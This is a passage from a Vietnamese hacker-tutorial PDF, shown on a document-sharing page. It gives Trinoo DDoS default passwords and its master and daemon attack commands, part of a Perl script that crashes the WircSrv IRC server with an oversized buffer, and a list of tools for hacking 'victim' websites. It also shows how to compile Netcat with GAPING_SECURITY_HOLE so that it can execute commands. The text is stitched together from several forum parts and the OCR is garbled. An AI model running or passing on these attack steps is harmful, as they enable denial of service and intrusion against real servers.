Hacking Security Sites part 9

Chia sẻ: Dqwdasdasd Qwdasdasdasd | Ngày: | Loại File: PDF | Số trang:6

0
89
lượt xem
27
download

Hacking Security Sites part 9

Mô tả tài liệu
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Những passwd này thường được mã hoá và bạn có thể thiết lập khi biên dịch Trinoo từ Source ----- Binnary. Khi được chạy , Deadmons sẽ hiện ra một dấu nhắc và chờ passwd nhập vào Hacking Security Sites part 9

Chủ đề:
Lưu

Nội dung Text: Hacking Security Sites part 9

  1. mới có thể điều khiển được chúng , điều này không có gì khó khăn nếu chúng ta là chủ nhân thực sự của chúng . Những passwd này thường được mã hoá và bạn có thể thiết lập khi biên dịch Trinoo từ Source ----- > Binnary. Khi được chạy , Deadmons sẽ hiện ra một dấu nhắc và chờ passwd nhập vào , nếu passwd nhập sai nó sẽ tự động thoát còn nếu passwd được nhập đúng thì nó sẽ tự động chạy trên nền của hệ thống . attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is `^]`. kwijibo Connection closed by foreign host. < == Bạn đã nhập sai attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is `^]`. betaalmostdone trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/] trinoo > < == bạn đã vào được hệ thống trinoo _ Đây là vài passwd mặc định : “l44adsl``: pass của trinoo daemon . ``gorave``: passwd của trinoo master server khi startup . ``betaalmostdone``: passwd điều khiển từ xa chung cho trinoo master . ``killme``: passwd trinoo master điều khiển lệnh ``mdie`` . _ Đây là một số lệnh dùng để điều khiển Master Server: CODE die------------------------------------------------ ------------Shutdown. quit----------------------------------------------- -------------Log off. mtimer N-------------------------------------------------- --Đặt thờI gian để tấn công DoS , vớI N nhận giá trị từ 1-- > 1999 giây . dos IP------------------------------------------------- ------Tấn công đến một địa chỉ IP xác định . mdie pass----------------------------------------------- ----Vô hiệu hoá tất cả các Broadcast , nếu như passwd chính xác . Một lệnh đưọc gửi tới (``d1e l44adsl``) Broadcast để Shutdown chúng . Một passwd riêng biệt sẽ được đặt cho mục này mping---------------------------------------------- ----------Gửi một lệnh ping tới (``png
  2. l44adsl``) c¸c Broadcast. mdos ------------------------------------------Send nhiều lênh DOS (``xyz l44adsl 123:ip1:ip2``) đến các Broadcast. info----------------------------------------------- --------------Hiển thị thông tin về Trinoo . msize---------------------------------------------- ------------Đặt kích thước đệm cho những gói tin được send đi trong suốt thờI gian DoS. nslookup host----------------------------------------------X ác định tên thiết bị của Host mà Master Trinoo đang chạy . usebackup------------------------------------------ ---------Chuyển tớI các file Broadcast sao lưu được tạo bởi lệnh “killdead”. bcast---------------------------------------------- -------------Liệt kê danh sách tất cả các Broadcast có thể khai thác . help [cmd] --------------------------------------------------- Đưa ra danh sách các lệnh . mstop---------------------------------------------- -------------Ngừng lại các cuốc tấn công DOS . _ Đây là một số lệnh dùng để điều khiển Trinoo Deadmons: CODE aaa pass IP------------------------------------------------- ---Tấn công đến địa chỉ IP đã xác định . GửI gói tin UDP (0-65534) đến cổng của UDP của địa chỉ IP đã xác định trong một khoảng thời gian xác định được mặc định là 120s hay từ 1-- > 1999 s . bbb pass N-------------------------------------------------- ---Đặt thờI gian giới hạn cho các cuộc tấn công DOS . Shi pass----------------------------------------------- ---------Gửi chuỗi “*HELLO*” tới dánh sách Master Server đã được biên dịch trong chương trình trên cổng 31335/UDP. png pass----------------------------------------------- --------Send chuỗi “Pong” tớI Master Server phát hành các lệnh điều khiển trên cổng 31335/UDP. die pass----------------------------------------------- ---------Shutdown Trinoo. rsz N-------------------------------------------------- ----------Là kích thước của bộ đệm được dùng để tấn công , nó được tính bằng byte . xyz pass 123:ip1:ip3---------------------------------------- tấn công DOS nhiều mục tiêu cùng lúc . ( Dựa theo hướng dẫn của huynh Binhnx2000 ) Còn nhiều đoạn mã và cách ứng dụng để DoS lắm , các bạn chịu khó tìm hiểu thêm nhé . Nhưng đừng tấn công lung tung , nhất là server của HVA , coi chừng không thu được hiệu quả mà còn bị lock nick nữa đó Hết phần 6
  3. Anhdenday HVaonline.net Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 7 / 19-12-2004 42 . ) Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 : _ WircSrv IRC là một Server IRC thông dụng trên Internet ,nó sẽ bị Crash nếu như bị các Hacker gửi một Packet lớn hơn giá trị ( 65000 ký tự ) cho phép đến Port 6667. Bạn có thể thực hiện việc này bằng cách Telnet đến WircSrv trên Port 6667: Nếu bạn dùng Unix: [hellme@die-communitech.net$ telnet irc.example.com 6667 Trying example.com... Connected to example.com. Escape character is `^]`. [buffer] Windows cũng tương tự: telnet irc.example.com 6667 Lưu ý: [buffer] là Packet dữ liệu tương đương với 65000 ký tự . Tuy nhiên , chúng ta sẽ crash nó rất đơn giản bằng đoạn mã sau ( Các bạn hãy nhìn vào đoạn mã và tự mình giải mã những câu lệnh trong đó , đó cũng là một trong những cách tập luyện cho sự phản xạ của các hacker khi họ nghiên cứu . Nào , chúng ta hãy phân tích nó một cách căn bản ): CODE #!/usr/bin/perl #< == Đoạn mã này cho ta biết là dùng cho các lệnh trong perl use Getopt::Std; use Socket; getopts(`s:`, \%args); if(!defined($args{s})){&usage;} my($serv,$port,$foo,$number,$data,$buf,$in_addr,$p a ddr,$proto); $foo = ``A``; # Đây là NOP $number = ``65000``; # Đây là tất cả số NOP $data .= $foo x $number; # kết quả của $foo times $number $serv = $args{s}; # lệnh điều khiển server từ xa $port = 6667; # lệnh điều khiển cổng từ xa , nó được mặc định là 6667
  4. $buf = ``$data``; $in_addr = (gethostbyname($serv))[4] Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 8 47 . ) Các công cụ cần thiết để hack Web : _ Đối với các hacker chuyên nghiệp thì họ sẽ không cần sử dụng những công cụ này mà họ sẽ trực tiếp setup phiên bản mà trang Web nạn nhân sử dụng trên máy của mình để test lỗi . Nhưng đối với các bạn mới “vào nghề” thì những công cụ này rất cần thiết , hãy sử dụng chúng một vài lần bạn sẽ biết cách phối hợp chúng để việc tìm ra lỗi trên các trang Web nạn nhân được nhanh chóng nhất . Sau đây là một số công cụ bạn cần phải có trên máy “làm ăn” của mình : _ Công cụ thứ 1 : Một cái proxy dùng để che dấu IP và vượt tường lửa khi cần ( Cách tạo 1 cái Proxy tôi đã bày ở phần 7 , các bạn hãy xem lại nhé ) . _ Công cụ thứ 2 : Bạn cần có 1 shell account, cái này thực sự quan trọng đối với bạn . Một shell account tốt là 1 shell account cho phép bạn chạy các chương trình chính như nslookup, host, dig, ping, traceroute, telnet, ssh, ftp,...và shell account đó cần phải cài chương trình GCC ( rất quan trọng trong việc dịch (compile) các exploit được viết bằng C) như MinGW, Cygwin và các dev tools khác. Shell account gần giống với DOS shell,nhưng nó có nhiều câu lệnh và chức năng hơn DOS . Thông thường khi bạn cài Unix thì bạn sẽ có 1 shell account, nếu bạn không cài Unix thì bạn nên đăng ký trên mạng 1 shell account free hoặc nếu có ai đó cài Unix và thiết lập cho bạn 1 shell account thì bạn có thể log vào telnet (Start -- > Run -- > gõ Telnet) để dùng shell account đó. Sau đây là 1 số địa chỉ bạn có thể đăng ký free shell account : http://www.freedomshell.com/ http://www.cyberspace.org/shell.ht ml http://www.ultrashell.net/ _Công cụ thứ 3 : NMAP là Công cụ quét cực nhanh và mạnh. Có thể quét trên mạng diện rộng và đặc biệt tốt đối với mạng đơn lẻ. NMAP giúp bạn xem những dịch vụ nào đang chạy trên server (services / ports : webserver , ftpserver , pop3,...),server đang dùng hệ điều hành gì,loại tường lửa mà server sử dụng,...và rất nhiều tính năng khác.Nói chung NMAP hỗ trợ hầu hết các kỹ thuật quét như : ICMP (ping aweep),IP protocol , Null scan , TCP SYN (half open),... NMAP được đánh giá là công cụ hàng đầu của các Hacker cũng như các nhà quản trị mạng trên thế giới. Mọi thông tin về NMAP bạn tham khảo tại http://www.insecure.org/ . _ Công cụ thứ 4 : Stealth HTTP Security Scanner là công cụ quét lỗi bảo mật tuyệt vời trên Win32. Nó có thể quét được hơn 13000 lỗi bảo mật và nhận diện được 5000 exploits
  5. khác. _ Công cụ thứ 5 : IntelliTamper là công cụ hiển thị cấu trúc của một Website gồm những thư mục và file nào, nó có thể liệt kê được cả thư mục và file có set password. Rất tiện cho việc Hack Website vì trước khi bạn Hack một Website thì bạn phải nắm một số thông tin của Admin và Website đó. _ Công cụ thứ 6 : Netcat là công cụ đọc và ghi dữ liệu qua mạng thông qua giao thức TCP hoặc UDP. Bạn có thể dùng Netcat 1 cách trực tiếp hoặc sử dụng chương trình script khác để điều khiển Netcat. Netcat được coi như 1 exploitation tool do nó có thể tạo được liên kết giữa bạn và server cho việc đọc và ghi dữ liệu ( tất nhiên là khi Netcat đã được cài trên 1 server bị lỗI ). Mọi thông tin về Netcat bạn có thể tham khảo tại http://www.l0pht.com/ . _ Công cụ thứ 7 : Active Perl là công cụ đọc các file Perl đuôi *.pl vì các exploit thường được viết bằng Perl . Nó còn được sử dụng để thi hành các lệnh thông qua các file *.pl . _ Công cụ thứ 8 : Linux là hệ điều hành hầu hết các hacker đều sử dụng. _ Công cụ thứ 9 : L0phtCrack là công cụ số một để Crack Password của Windows NT/2000 . _ Cách Download tôi đã bày rồi nên không nói ở đây , các bạn khi Download nhớ chú ý đến các phiên bản của chúng , phiên bản nào có số lớn nhất thì các bạn hãy Down về mà sài vì nó sẽ có thêm một số tính năng mà các phiên bản trước chưa có . Nếu down về mà các bạn không biết sử dụng thì tìm lại các bài viết cũ có hướng dẫn bên Box “Đồ nghề” . Nếu vẫn không thấy thì cứ post bài hỏi , các bạn bên đó sẽ trả lời cho bạn . 48 . ) Hướng dẫn sử dụng Netcat : a . ) Giới thiệu : Netcat là một công cụ không thể thiếu được nếu bạn muốn hack một website nào đó vì nó rất mạnh và tiện dụng . Do đó bạn cần biết một chút về Netcat . b . ) Biên dịch : _ Đối với bản Netcat cho Linux, bạn phải biên dịch nó trước khi sử dụng. - hiệu chỉnh file netcat.c bằng vi: vi netcat.c + tìm dòng res_init(); trong main() và thêm vào trước 2 dấu ``/``: // res_init(); + thêm 2 dòng sau vào phần #define (nằm ở đầu file): #define GAPING_SECURITY_HOLE #define TELNET - biên dịch: make linux - chạy thử: ./nc -h
  6. - nếu bạn muốn chạy Netcat bằng nc thay cho ./nc, bạn chỉ cần hiệu chỉnh lại biến môi trường PATH trong file ~/.bashrc, thêm vào ``:.`` PATH=/sbin:/usr/sbin:...:. _ Bản Netcat cho Win không cần phải compile vì đã có sẵn file nhị phân nc.exe. Chỉ vậy giải nén và chạy là xong. c . ) Các tùy chọn của Netcat : _ Netcat chạy ở chế độ dòng lệnh. Bạn chạy nc -h để biết các tham số: CODE C:\ > nc -h connect to somewhere: nc [-options] hostname port [ports] ...  
Đồng bộ tài khoản